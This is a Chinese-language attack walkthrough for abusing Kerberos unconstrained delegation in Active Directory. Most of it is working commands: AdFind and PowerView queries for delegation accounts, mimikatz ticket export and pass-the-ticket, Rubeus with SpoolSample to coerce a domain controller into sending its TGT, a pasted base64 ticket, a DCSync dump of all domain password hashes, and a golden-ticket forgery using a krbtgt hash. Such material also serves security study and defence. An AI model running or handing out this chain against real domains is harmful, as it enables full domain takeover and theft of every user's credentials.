委派:
用户A访问服务B,当用户A访问服务B时,服务B的服务账户会打开非约束委派TGT将其发送到服务B并保存到内存中,服务B可以访问用户A可以访问的任何服务
第一种非约束性委派:
域内只有服务账号和主机账号才能指定属性 主机账号也叫机器账号(一个普通域用户默认最多可以创建十个主机账号) 服务账户通过域用户注册SPN变为服务账号
setspn -U -A mysql/fileserver.fbi.gov fileserver 需要查询当前域内非约束委派用户
AdFind.exe -b "DC=fbi,DC=gov" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName 
查找域内非约束用户和计算机
查询域内所有非约束委派用户Get-NetUser -Unconstrained -Domain fbi.gov 查询域中所有非约束委派计算机Get-NetComputer -Unconstrained -Domain fbi.gov 使用 dc 或域管,登录 fileserver ,可在 fileserver保留票据凭证,然后设置非约束机器进行域控模拟访问:
Enter-PSSession -ComputerName fileserver 域控模拟访问被设置为约束委派的机器后,此时实际上是域管理员 TGT 已经缓存在 fileserver 在机器上mimikatz
privilege::debug sekurlsa::tickets /export kerberos::ptt [0;124f863]-2-0-60a10000-Administrator@krbtgt-FBI.GOV.kirbi misc::cmd klist 这个时候可以用klist命令检查票据是否导入
dir \\dc\c$ 第二种方法(非约束性委派) Spooler打印机服务):
Rubeus监听
Rubeus.exe monitor /interval:1 /filteruser:dc$ %%% 用Rubeus来监听Event ID对于4624事件,可以在第一时间截取域控TGT %%% /interval:1 设置监控间隔1秒 %%% filteruser 监控对象是我们的域控,后面注意一个$,如果没有监听对象,监听所有监听对象TGT %%% DC$添加域控主机名称$ 使用打印服务强使域控机验证其身份 下载spoolsample.exe,该程序需要运行.net4。win7作为当前域用户运行。win7防火墙需要关闭,否则无法接收ticket SpoolSample.exe dc fileserver
此时Rubeus已收到TGT 复制监听到的TGT的base64.去空格。以下是去空格的网站
https://uutool.cn/nl-trim-all/ 然后直接用powershell转正常TGT即可 [IO.File]::WriteAllBytes(绝对路径\ticket.kirbi”, [Convert]::FromBase64String(“TGT”))
[IO.File]::WriteAllBytes("dc.kirbi",[Convert]::FromBase64String("doIEujCCBLagAwIBBaEDAgEWooID0zCCA89hggPLMIIDx6ADAgEFoQkbB0ZCSS5HT1aiHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB0ZC SS5HT1ajggOVMIIDkaADAgESoQMCAQKiggODBIIDf4tq6aABFZ/ANADOwSpeZtVTimkVP9nsvhoe9IDH1nsBPIAZ2 PNYfoSdB9f er7gO6ADskID6OPSIJJIg sBwBJdNkXMYfkwq8Pt1PgMhIxfq4XyUfijm65Jf KUD3KIOeCcvPBs711SHCWyGHLrMBcl7nfvuRuQ eyW0W6yoUedQeYKFhHSOWsRUDd8q/SJ8XEnthcl0TpQEXYUKiIm5ZL/tfg6WF0JG6jJIjfvdsv0tbys7gvMx0tadD0QXKP4mrpKd zOyFQ7bBLVkFDYsbjzzy9wPCC73jfYXiFNHPAgmG9cbLa3wqa4zZ9zhTjqd3ZHLn2awAOk84AlCBPsCjvI9PAdHw2QzLhMMSuZZf gH6B/LsyuOgRZPIbxS2aGr 23L9B6jkjOgExuQpfF/xlYjLrhfBzp/nNJ9ehvR4J8HP6XM ucCnO1uJuMNT3Ncj0RObUlCKrbA6N CrDu0BsFPapZZEqTY8lW7mCDeINk5NuXpZqmXhnC RomhBsdLMUKS4oPlqBbSOwOOYbNIeUvn2vTOQEngvLdtuGe0A7sUEp/Dmka 5pe4fYJEBpcB9XQIMOLo7Wo7sN8Zac5zqYLbHhJz5bmP1GJ9eaE26x9ijdgmBG0znNjBGw53GMkZ8j HmMElAXt4Kyiin7zyYZKM 36JchH79vWn1NGdxFViWwVAciDfJEVk0c/3j0NiLKIOBXK/3UdgGJ6PM1w3f4F012t8xsfjcce GZx499b8QUj8PL8dpAjD18H12 y5trfh/CzEiBddsU7HYeU1RZ8Ve5WtGKjUK8bRMLjLYFdFOVHKzhmcOCaE5xCiN Oirr2AhSjLpnJQWBi4WFl5YskXYpYy10dYNw MwtveB0ojeLdpYDEoyDigCs191YJwKoz35XNdonICDpUkWncT6gtFvojw9g8Xeu4kN6tRmPSGY3w/wlk/u BaJdfGCLj8XOEkLRY rSynaWIDonaARisWy1x/SjdJGSaHKz /1 3H/KoM9F7CFCenE61L0hPr3nUdno8hlSCy41cTfzP1SDDQSO0JIg5a6m1isIiUNmcQ 9aZHCnhGZZC0IYbJNiVFLlqpLeyEMQmTaYFMyUIVcivnkmhTWq4H6iGms/scuq9uyk3Pywwl6KSsPbSizI0ZEl9KIu7Uh9VeQ2Bi SBlkdc KCyQYnguBh X/i08acxhdhayH4fKjgdIwgc gAwIBAKKBxwSBxH2BwTCBvqCBuzCBuDCBtaArMCmgAwIBEqEiBCBL34Na cMCN7myuuGmuIx3MuUs4Pu42KCxU3Avd iV2EKEJGwdGQkkuR09WohAwDqADAgEBoQcwBRsDREMkowcDBQBgoQAApREYDzIwMjIw NzIzMDEzMTMxWqYRGA8yMDIyMDcyMzExMzEyN1qnERgPMjAyMjA3MzAwMTMxMjdaqAkbB0ZCSS5HT1apHDAaoAMCAQKhEzARGwZr cmJ0Z3QbB0ZCSS5HT1Y=")) 注入TGT票据到当前会话并导出域控中的所有用户hash mimikatz以域用户身份运行
kerberos::ptt ticket.kirbi lsadump::dcsync /domain:test.lab /all /csv 请注意,我们在这里得到的TGT票据不能算黄金票据,因为我们获得的权限只是域控的本地管理权限,所以不能连接域控,但我们确实可以获得所有用户的权限hash,因此,我们可以制作真正的黄金票据
制作黄金票据 既然存在krbtgt用户和用户hash或者NTML可以用它生成黄金票据
- 获取此帐号sid
本机现在执行 whoami /user,注意以后不需要表示账号权限的几位数
-
制作票据
kerberos::golden /domain:fbi.gov /sid:S-1-5-21-124841762-3349575232-3850797422-1103 /krbtgt:d19009f38e6b6720109b3fab3fa98090 /user:Administrator /ptt
此时已经可以连接域控了 dir \dc\c$
–